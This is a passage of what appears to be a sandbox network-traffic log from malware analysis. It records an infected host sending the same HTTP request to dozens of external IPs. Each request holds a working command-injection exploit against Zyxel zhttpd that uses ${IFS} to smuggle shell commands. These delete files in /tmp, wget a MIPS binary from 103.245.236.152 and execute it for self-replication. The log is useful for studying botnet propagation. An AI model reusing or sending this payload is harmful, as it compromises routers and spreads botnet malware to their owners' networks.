                                        Jan 14, 2024 16:18:00.937077045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22192.168.2.1332938177.207.20.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937150002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23192.168.2.1351674165.251.169.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937187910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24192.168.2.1336626170.215.241.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937242985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25192.168.2.1352920173.176.230.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937293053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        26192.168.2.1356532167.176.211.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937334061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        27192.168.2.135434835.100.163.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937365055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        28192.168.2.1333404128.132.255.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937434912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        29192.168.2.134775642.147.94.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937469959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        30192.168.2.13508129.6.229.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937541008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        31192.168.2.1343402138.245.88.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937567949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        32192.168.2.135691839.244.46.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937633991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        33192.168.2.1357018153.152.82.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937680960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        34192.168.2.1349928160.71.207.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937746048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        35192.168.2.1337306118.61.29.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937777042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        36192.168.2.1354152110.118.254.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937805891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        37192.168.2.134031643.38.1.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937922001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        38192.168.2.1351612157.138.97.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937922001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        39192.168.2.134965683.239.68.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937927008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        40192.168.2.135617295.82.92.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937999010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        41192.168.2.1351330128.204.164.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938019037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        42192.168.2.1355024115.18.192.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938113928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        43192.168.2.1354166151.224.30.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938128948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        44192.168.2.1335954123.149.96.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938189983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        45192.168.2.135890447.172.167.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938257933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        46192.168.2.1332778143.49.194.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938292027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        47192.168.2.1359170114.115.133.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938328028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        48192.168.2.133382860.198.248.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938427925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        49192.168.2.1357138163.250.245.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938457012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        50192.168.2.1347972116.16.245.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938488007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        51192.168.2.1356992220.196.88.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938517094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        52192.168.2.1354762123.249.171.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938535929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        53192.168.2.1337772192.254.146.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938604116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        54192.168.2.1336314213.208.91.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938652039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        55192.168.2.135061876.144.140.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938694954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        56192.168.2.1340904117.177.211.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938713074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        57192.168.2.1354918104.139.159.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938759089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        58192.168.2.1334296137.190.28.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938791037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        59192.168.2.1357536174.109.200.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938859940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        60192.168.2.1347010126.24.204.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938886881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        61192.168.2.1345672123.22.49.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938915968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        62192.168.2.135644897.125.202.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.938988924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        63192.168.2.1360942132.152.124.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939052105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        64192.168.2.134470814.196.196.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939076900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        65192.168.2.134453684.58.227.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939121962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        66192.168.2.1360860200.12.6.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939155102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        67192.168.2.136075825.102.93.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939215899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        68192.168.2.1346858144.67.230.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939249992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        69192.168.2.1352676174.105.233.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939282894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        70192.168.2.1341884183.149.120.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939322948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        71192.168.2.1333276183.158.242.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939372063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        72192.168.2.134198462.157.234.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939435959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        73192.168.2.135013823.111.128.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939466000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        74192.168.2.1360706161.139.166.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939502001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        75192.168.2.1346986190.238.65.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939588070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        76192.168.2.133845818.80.86.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939650059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        77192.168.2.1333848144.98.197.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939652920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        78192.168.2.1333904153.15.130.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939696074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        79192.168.2.1358094139.192.105.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939759970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        80192.168.2.1357694126.118.254.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939821005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        81192.168.2.1333258182.73.87.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939845085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        82192.168.2.1359542103.58.82.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939892054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        83192.168.2.1354840126.241.254.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939912081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        84192.168.2.134424858.63.159.199443
                                        TimestampBytes transferredDirectionData
